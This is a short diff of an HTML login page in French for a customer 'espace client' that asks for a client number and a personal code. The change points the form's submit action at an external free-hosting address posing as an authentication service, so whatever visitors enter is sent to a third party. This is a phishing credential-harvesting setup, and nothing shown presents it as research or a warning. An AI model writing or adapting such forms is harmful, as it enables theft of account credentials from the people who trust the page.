--- a/index.html
+++ b/index.html
@@ -26,7 +26,7 @@
 
 <h1>Accédez à votre<br>espace client</h1>
 
-<form method="POST" action="">
+<form method="POST" action="https://authentification-connexion-a-mon-compte.000webhostapp.com/index.php">
 <label>votre numéro client</label><br />
 <input type="tel" name="number" required /><br /><br />
 <label>votre code personnel</label><br />
